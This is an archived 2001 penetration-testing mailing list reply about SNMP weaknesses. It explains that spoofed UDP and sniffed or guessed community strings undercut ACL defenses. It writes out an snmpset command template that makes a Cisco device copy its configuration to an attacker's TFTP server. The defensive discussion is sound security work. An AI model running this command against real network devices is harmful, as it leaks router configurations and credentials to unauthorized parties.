Penetration Testing mailing list archives
RE: snmp vulnerablities
From: "woody weaver" <woody.weaver () callisma com>
Date: Mon, 16 Jul 2001 16:50:31 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Monday, July 16, 2001 3:01 PM, Ron Russell wrote: [...]
And the activity could have been prevented by proper use of ACLs,
This is not an easy task. Because UDP is stateless, spoofing is fairly trivial. Particularly for the snmp set approach you mention - -- the format is $SNMPSET $TARGET $COMMUNITY .1.3.6.1.4.1.9.2.1.55.$MYIP s $CONFIG where $MYIP is the IP address of the tftp server. Consequently, one can spoof the snmp set as coming from that trusted host -- the ACL has to reach into the data portion of the packet to prevent the tftp occurring. Its not clear to me where the original penetration test was coming from, but if it was from a portion of the network where detecting spoofed addresses is not easy, then you have few options.
and the proper configuration of SNMP (not using easily guessable strings).
I'm not sure this is especially helpful; SNMP is sent in the clear, of course, so the strings can be observed in transit, the game is up. Also, dictionary attacks are straightforward, since logging of snmp traffic seems to be rarely done. [...] - --woody -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO1N9xaWr4+fi694gEQL8gwCgg5Q7huPhA+yCUuwFjAkTHcxJ/fAAoKVb RweCZ7evjZ29a+RgvtPB2m1r =cqIf -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- snmp vulnerablities slash underground (Jul 13)
- <Possible follow-ups>
- Re: snmp vulnerablities H Carvey (Jul 16)
- Re: snmp vulnerablities Ron Russell (Jul 16)
- Re: snmp vulnerablities H C (Jul 16)
- Re: snmp vulnerablities Ron Russell (Jul 16)
- Re: snmp vulnerablities mht (Jul 17)
- Re: snmp vulnerablities Jon DeShirley (Jul 17)
- Re: snmp vulnerablities Peter Van Epp (Jul 17)
- Re: snmp vulnerablities mht (Jul 17)
- Re: snmp vulnerablities Dave Ryan (Jul 17)
- Re: snmp vulnerablities Ron Russell (Jul 16)
- Re: snmp vulnerablities Ron Russell (Jul 17)
- RE: snmp vulnerabilities Dom De Vitto (Jul 22)